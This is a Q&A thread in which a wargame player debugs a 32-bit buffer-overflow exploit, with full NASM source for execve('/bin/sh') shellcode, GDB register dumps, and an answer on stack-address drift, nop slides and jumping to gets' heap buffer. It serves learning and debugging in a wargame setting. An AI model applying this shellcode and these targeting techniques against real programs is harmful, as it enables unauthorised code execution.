Verified correct shellcode segfaults when run normally; “No such file” in GDB…?

Question

For a wargame, I'm exploiting a buffer overflow to inject some shellcode to spawn /bin/sh. I started by writing my own shellcode, but I got some bizarre errors, so I tried a piece of known working shellcode – and got the same error! However, it gets weirder: running it locally (i.e. not on the wargame server) works fine (so I've verified the problem isn't with the code), and running it in GDB produces a different error.

When run normally:

$ ./program < /tmp/shellcode
[program output...]
zsh: segmentation fault  ./program < /tmp/shellcode

When run in GDB:

(gdb) run < /tmp/shellcode
[program output...]
process 2242 is executing new program: /proc/2242/exe
/proc/2242/exe: No such file or directory.

The shellcode can be found here, or, in NASM Intel syntax:

    BITS 32

    ; Set up "/bin/sh" string
    xor eax, eax
    push eax
    push 0x68732F2F
    push 0x6E69622F
    
    ; Set up execve arguments
    mov ebx, esp
    mov ecx, eax
    mov edx, eax
    mov al, 0xB ; execve's ID
    int 0x80

    ; exit()
    xor eax, eax
    inc eax
    int 0x80

I've confirmed in GDB that the code is inserted properly, that it's jumped to in the correct place, and even that execution reaches the int 0x80 that's supposed to spawn a shell – but as soon as you try to si past it, it gives you the error above.

I've also confirmed at the point of the int 0x80 that the registers are, as far as I can tell, in order for an execve call. Here are the inspected registers from my own shellcode (not from the shellcode above, which sets up ecx and edx to null pointers, but this produces the same error):

(gdb) x/i $pc
=> 0xffffdc47:  int    0x80

eax            0xb      11

(gdb) # EBX should point to "/bin/sh"
(gdb) x/s $ebx
0xffffdc4e:     "/bin/sh"

(gdb) # ECX should point to a null-terminated pointer array.
(gdb) x/2wx $ecx
0xffffdc31:     0xffffdc4e      0x00000000

(gdb) # EDX should point to NULL.
(gdb) x/wx $edx
0xffffdc35:     0x00000000

Why does this execve syscall not work? And… what in the world could /proc/2242/exe be? The string sent to execve is "/bin/sh"! Given that this works when run locally, could the issue somehow be with the server's environment?

Some considerations:

file output: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=..., not stripped
ASLR is off.
It's not a pointer alignment issue – I tried aligning them to 4-byte boundaries, and nothin' changed.
/bin/sh exists, so that's not the file that isn't being found.
To reiterate, just to be sure, it works with the exact same binary and the exact same shellcode on another system, so it's not an issue with the code itself.

What environment is the target environment (what distro/platform)? Does it happen to be WSL (Windows Subsystem for Linux) How do you compile the GCC code (What command line do you use to build the shellcode). DO you compile with `-zexecstack` to make the stack executable? — Michael Petch, Dec 08 '20 at 09:11
@MichaelPetch The target environment is `Linux [...] 3.16.0-4-amd64 #1 SMP Debian 3.16.51-2 (2017-12-03) x86_64 GNU/Linux`, it's not WSL, the program was compiled with `gcc program.c -fno-stack-protector -z execstack -m32 -o program`, the shellcode was compiled with `nasm shellcode.nas -o shellcode`, and I've indeed verified that execution reaches the `int 0x80` in the shellcode. — obskyr, Dec 08 '20 at 09:15
If `int 0x80` causes a segfault I almost wonder if IA32_EMULATION is off in the target environment. What is the output of this command `zcat /proc/config.gz | grep IA32` — Michael Petch, Dec 08 '20 at 09:22
@MichaelPetch I'm not sure it's `0x80` that causes the segfault – I tried some shellcode with some `geteuid` syscalls before the `execv` one, and they executed fine in GDB – but when I ran `strace program < input.bin`, it didn't log it. I suspect that when run outside of GDB, the shellcode might not even be reached properly (which is bizarre, as earlier levels of the wargame have confirmed that ASLR is off). — obskyr, Dec 08 '20 at 09:26
On the target system what is the output of `strace ./program < /tmp/shellcode` . strace should say what the parameters to the system call are. The only unusual thing is that you make the second parameter to the system call NULL. Usually the second parameter is not NULL. Not sure if that is causing a problem. Usually the second parameter is an argv list and argv[0] is often set to the same as the first parameter to the system call — Michael Petch, Dec 08 '20 at 09:36
I almost wonder if what is going on is that the exploitable program on the remote server see the character `\x0b` as some kind of line terminator and everything from `\x0b` onward in the string is not seen. — Michael Petch, Dec 08 '20 at 10:02
Syscalls don’t segfault when given bad pointer arguments; they return errors. Which instruction gets the segfault? What is $eax after the int 80 is executed ? — Mark Plotnick, Dec 08 '20 at 12:11
@MichaelPetch: It's totally normal on Linux to do `execve("/bin/sh", NULL, NULL)` in shellcode, and even documented by the man page to be treated the same as pointers to empty lists. https://man7.org/linux/man-pages/man2/execve.2.html#NOTES - it's not of course portable to other POSIX systems, but shellcode doesn't care. I guess it may surprise some implementations of `/bin/sh` that `argv[0] == NULL`, though, so it might crash after a successful execve. But that would be detectable by `strace -f`. — Peter Cordes, Dec 08 '20 at 12:12

score 2 · Answer 1 · answered Dec 09 '20 at 07:24

2

As it turns out, the segfault when running the program normally depends on a difference in GDB's environment! The stack state differs based on various things in the environment, which makes the code jump to the right place in GDB – but since I'm jumping to some shellcode on the stack, it's dependent on the current stack length and thus jumps to some invalid place when run normally. Why it works locally I can only guess, but I suppose my local environment simply lines up with that of GDB on the target machine.

I figured out three ways to fix this:

I could try various addresses in the vicinity of where I expect the stack pointer to be until I hit paydirt – perhaps a nop slide would help.
Or, as it turns out, gets has an internal buffer on the heap into which things go before they're copied (sans terminating newline) to their final destination. Since that's always in the same place (when ASLR is off), and since I'm injecting my shellcode via gets, I could jump there. And that is indeed what I ended up doing!
But the most facepalm-encouraging way of all is… I can simply run it via the ! shell command of GDB. Despite (gdb) run < /tmp/shellcode erroring out, and ./program < /tmp/shellcode segfaulting, (gdb) !./program < /tmp/shellcode works. This is because running that way ostensibly runs the program "normally" – in a shell – but with GDB's environment, thus ensuring that the stack state matches up.

So what about the GDB error? The /proc/1234/exe: No such file or directory. one? Well, here's the punchline: that error is unrelated, and happens even with a correct solution. As soon as the int 0x80 of an execve syscall is reached, GDB produces that error (and for some reason forgets the program that's being run, as well). I have absolutely no idea why it happens – if anyone has a clue, please share.

answered Dec 09 '20 at 07:24

obskyr

1,380
1
9
25

Run your program under `strace -f` to see the execve and what happens after. If you're passing that path to an execve system call, it probably doesn't exist if it's a literal 1234 as the PID it's looking for. – Peter Cordes Dec 09 '20 at 14:19
@PeterCordes That's an example! In reality, the PID of the process goes there. The string "/bin/sh\0" is where `ebx` points – that error happens even with the solution that's verified working. – obskyr Dec 09 '20 at 16:19
Oh, if invoked with `argv[0] == NULL`, your shell is probably printing its own name as `/proc//exe` where it would normally print `/bin/sh` or however it was invoked. So some shell command it tried to execute produced that error message. Again, use `strace -f` to trace into forks and execs to see what the newly-execed process is doing. Look for a system call that returns `-ENOENT`. – Peter Cordes Dec 09 '20 at 16:28
@PeterCordes That's a smart hypothesis! But I don't think so: this happens even when `ecx` points to `{"/bin/sh\0", 0}`. – obskyr Dec 09 '20 at 16:31
Ok, well `strace` into the newly execed process and find out what is happening, then, and what syscall returned `-ENOENT` that convinced something to print that error message. If you want any help explaining that, just use strace and edit the output into your question. – Peter Cordes Dec 09 '20 at 16:47
@PeterCordes I can't, since no process is actually successfully spawned when running in GDB – running `si` to step past the `int 0x80` immediately produces the error. – obskyr Dec 09 '20 at 16:49
`strace` is a shell command, not a GDB command! It "attaches" to a process similarly to how GDB does, but asks the kernel to trace system calls, instead of doing asm single-step and so on. Also, your answer says you figured out what was wrong, so you should be able to fix the addresses in the exploit payload to work with whatever stack address is necessary. – Peter Cordes Dec 09 '20 at 16:54
@PeterCordes Ah, I understand what you'd like to see now! `strace` prints `execve("/bin/sh", ["/bin/sh"], [/* 0 vars */]) = 0`. Executes flawlessly in the shell. – obskyr Dec 09 '20 at 17:02
Oh, I think I misunderstood where the error was coming from. It's printed by GDB as it tries to follow the execve? That makes sense, after an execve it would have to open the new executable. Does `ls -l /proc//exe` show a valid symlink? Or more importantly, does actually opening it work? Like `md5sum /proc/1234/exe` – Peter Cordes Dec 09 '20 at 17:13
@PeterCordes `No such file or directory.` Same with `/proc/1234/cwd` and `/proc/1234/cmdline`. – obskyr Dec 09 '20 at 17:16
`/proc` is how the kernel exports info about currently running processes. Obviously you have to do this *while* that PID exists as a running process, e.g. by single-stepping past the execve system call or otherwise arranging to stop inside the newly-execed process. I don't think it's possible that you get "No such file or directory" if the process is running, every process definitely will have a `/proc//cwd`, even if it's a broken symlink to a now-deleted directory. (Try using `stat` or `ls -l`, which will use `lstat` by default instead of `stat`, to not follow symlinks). – Peter Cordes Dec 09 '20 at 17:21
If you can't get GDB to single-step past / into `execve`, make the new process something long-running like `sleep 10m`. Or an interactive `/bin/sh` that blocks waiting for input from stdin. (If stdin is open on a terminal, which won't be the case for your exploit if you redirect from a file. Maybe `cat exploit - | ./target`. – Peter Cordes Dec 09 '20 at 17:23

Verified correct shellcode segfaults when run normally; “No such file” in GDB…?

1 Answers1